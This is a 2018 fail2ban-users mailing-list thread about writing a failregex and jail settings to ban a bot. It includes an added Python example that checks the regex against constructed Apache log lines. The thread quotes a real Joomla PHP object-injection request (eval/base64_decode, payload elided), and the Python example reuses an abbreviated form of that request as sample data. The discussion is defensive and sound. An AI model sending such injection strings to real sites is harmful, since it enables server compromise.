If you can give us your config files, we can help you build a really good
fail2ban setup. There's no security vulnerability in sharing your stuff -
the only thing you need to do is, do a find-and-replace and remove your
email address and servername - replace them with "*myemail.com*" and
"myserver.serv" so we can see they've been changed.
And btw, if you're worried that we will judge your files if they're too
messy or if you've made mistakes, trust me - people here don't do that.
We've *all* got terrible secrets lurking in our conf files, things we KNOW
we should've tidied up years ago but never got around to :-)
If you haven't set up a jail.local file and you're configuring everything
in jail.conf, now would be a good time to start. Every time there's an
update to fail2ban, it will wipe your config. It's easy to get this right,
so if you need a hand let me know.
Tony Collins
RMT Tier 1 Health & Safety Representative
Edgware Road Traincrew Depot
07949 228324
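Added example (not from this thread or from the fail2ban project): a small Python model of what a jail does with the failregex discussed below, `<HOST>.*JDatabaseDriverMysql`, run over constructed Apache access-log lines. It assumes a simplified `<HOST>` expansion and the sample lines are made up; it shows why a short findtime can leave a slowly retrying host unbanned.

```python
import re
from datetime import datetime, timedelta

# Approximation of what fail2ban substitutes for the <HOST> tag (the real
# expansion also covers IPv6 and hostnames; assumption for this example).
HOST_RE = r"(?:::f{4,6}:)?(?P<host>[\w\-.^_]*\w)"
# Apache's bracketed timestamp, e.g. [10/Aug/2018:18:01:00 +0000]
TIME_RE = re.compile(r"\[(\d{2}/\w{3}/\d{4}:\d{2}:\d{2}:\d{2} [+-]\d{4})\]")

# The regex suggested in the thread.
FAILREGEX = "<HOST>.*JDatabaseDriverMysql"

# Constructed access-log lines (not from the thread); the serialized PHP in
# the user-agent field is abbreviated and the base64 payload left out.
EXPLOIT_UA = '"}__test|O:21:\\"JDatabaseDriverMysqli\\":3:{s:2:\\"fc\\";O:20:\\"JDatabaseDriverMysql\\":0:{}}"'
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Aug/2018:18:01:00 +0000] "GET /administrator/ HTTP/1.1" 307 616 "-" ' + EXPLOIT_UA,
    '198.51.100.9 - - [10/Aug/2018:18:01:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Aug/2018:18:03:30 +0000] "GET /administrator/ HTTP/1.1" 307 616 "-" ' + EXPLOIT_UA,
    '203.0.113.7 - - [10/Aug/2018:18:25:00 +0000] "GET /administrator/ HTTP/1.1" 307 616 "-" ' + EXPLOIT_UA,
]

def compile_failregex(failregex):
    """Expand <HOST> the way fail2ban does and compile the line pattern."""
    return re.compile(failregex.replace("<HOST>", HOST_RE))

def offending_hosts(lines, failregex, findtime=600, maxretry=3):
    """Return {host: hits} for hosts that reach maxretry matches inside a
    findtime-second window, mimicking how a jail decides to ban."""
    pattern = compile_failregex(failregex)
    recent, banned = {}, {}
    for line in lines:
        m = pattern.search(line)
        if not m:
            continue  # would be counted under "missed" by fail2ban-regex
        when = datetime.strptime(TIME_RE.search(line).group(1), "%d/%b/%Y:%H:%M:%S %z")
        host = m.group("host")
        # Keep only this host's hits that are still inside the window.
        window = [t for t in recent.get(host, []) if when - t <= timedelta(seconds=findtime)]
        window.append(when)
        recent[host] = window
        if len(window) >= maxretry:
            banned[host] = len(window)
    return banned

if __name__ == "__main__":
    print("findtime=600 :", offending_hosts(SAMPLE_LOG, FAILREGEX, findtime=600))
    print("findtime=3600:", offending_hosts(SAMPLE_LOG, FAILREGEX, findtime=3600))
```

With the default 10-minute findtime the three hits from 203.0.113.7 never fall in one window, so nothing is banned; raising findtime to an hour bans it after the third hit.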
On 10 August 2018 at 18:15, Tony Collins <[email protected]> wrote:
> A quick and dirty way to deal with that is in your filter file.
>
> This isn't the best way but it will do it:
>
> failregex = <HOST>.*JDatabaseDriverMysql
>
> So that is using a 'regular expression' that says "the IP address,
> followed by any characters, followed by the specific string
> JDatabaseDriverMysql"
>
> Reload the jail, then see how it goes.
>
> You need to make sure that jail is also set up ok. That's why we need your
> conf and local files.
>
> When you say "apache-overflow ignores it", that might be for several
> reasons: 1) the regex might not be listed in apache-overflow.conf, or the
> log entry might be too old (in the [apache-overflow] entry in jail.local,
> "findtime" might not be long enough) - and so on.
>
> The failregex I just gave you will work for it - you can test it like this:
>
> fail2ban-regex logfile.log "<HOST>.*JDatabaseDriverMysql" --print-all-matched
>
> Just replace logfile.log with the filename that has the offending log line
> in it
>
> Tony Collins
> RMT Tier 1 Health & Safety Representative
> Edgware Road Traincrew Depot
> 07949 228324
>
> On 10 August 2018 at 18:01, Mauricio Tavares <[email protected]> wrote:
>
>> On Fri, Aug 10, 2018 at 12:49 PM, Wayne Sallee <[email protected]> wrote:
>> > Here is a 1 line log of a bot misbehaving:
>> >
>> > ***********************
>> > "GET /administrator/ HTTP/1.1" 307 616 5588 "-"
>> > "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\
>> "JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\
>> ";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:
>> 20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:5070:\"
>> eval(base64_decode('[base64-encoded payload elided]
>> '));JFactory::getConfig();exit\";s:19:\"cache_name_
>> function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_
>> class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";
>> }}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd"
>> > ************************
>> >
>> > What's the best way to set Fail2Ban to ban this kind of thing?
>> >
>> > [apache-overflows] ignores it.
>> >
>> If you know you will never use "feed_url" in a query, why not look for it?
>> >
>> > Wayne Sallee
>> > [email protected]
>> > http://www.WayneSallee.com
>> >
>> > On 08/10/2018 11:59 AM, Tony Collins wrote:
>> >
>> > The "missed" amount is the number of log entries that didn't get dealt with
>> > either under a "fail" rule or an "ignore" rule.
>> >
>> > The best thing to do is, paste in your jail.local file, as well as your jail
>> > filter .conf files. And then also include some of your fail2ban.log entries
>> >
>> > There could be loads of reasons why it isn't banning, and it's only possible
>> > to diagnose it with a bit more info.
>> >
>> > It's easy to include more than one log file in a jail. Here's an excerpt
>> > from my jail.local:
>> >
>> > [plesk]
>> > enabled = false
>> > action = %(ipset-action)s[name=%(__name__)s, bantime="%(bantime)s",
>> > port="%(port)s", protocol="%(protocol)s", chain="%(chain)s"]
>> > %(mta)s-whois-lines-logsonly[name=%(__name__)s, sender="%(sender)s",
>> > dest="%(destemail)s",
>> > logpath=/var/log/php_errors.log;/var/log/old-logs/php_errors/php_errors.log.1;/var/log/plesk/httpsd_access_log;/var/log/plesk/httpsd_access_log.processed;/var/log/plesk/httpsd_access_log.processed.1,
>> > chain="%(chain)s"]
>> > logpath = /var/log/php_errors.log
>> > /var/log/old-logs/php_errors/php_errors.log.1
>> > /var/log/plesk/httpsd_access_log
>> > /var/log/plesk/httpsd_access_log.processed
>> > /var/log/plesk/httpsd_access_log.processed.1
>> >
>> > Note the two different ways of adding more than one log file - either
>> > separated with a semi-colon ---> ; <--- or, separated with a newline.
>> >
>> > Tony Collins
>> > RMT Tier 1 Health & Safety Representative
>> > Edgware Road Traincrew Depot
>> > 07949 228324
>> >
>> > On 10 August 2018 at 16:01, Wayne Sallee <[email protected]> wrote:
>> >>
>> >> Fail2Ban is doing nothing but sending me e-mails when I restart fail2ban.
>> >> So at least that part works. :-)
>> >>
>> >> But it's not banning.
>> >> Error statements are almost useless.
>> >> Trying to run test commands or status commands gives me info that does not
>> >> help.
>> >>
>> >> What's the best way to test a jail?
>> >>
>> >> What is the proper way to include more than one log file in a jail?
>> >> How can I tell if the jail is using all listed log files?
>> >>
>> >> What does "2580 missed" mean?
>> >>
>> >> Wayne Sallee
>> >> [email protected]
>> >> http://www.WayneSallee.com
>> >>
>> >>
>> >> ------------------------------------------------------------
>> ------------------
>> >> Check out the vibrant tech community on one of the world's most
>> >> engaging tech sites, Slashdot.org! http://sdm.link/slashdot
>> >> _______________________________________________
>> >> Fail2ban-users mailing list
>> >> [email protected]
>> >> https://lists.sourceforge.net/lists/listinfo/fail2ban-users
>> >
>>
>>
>
>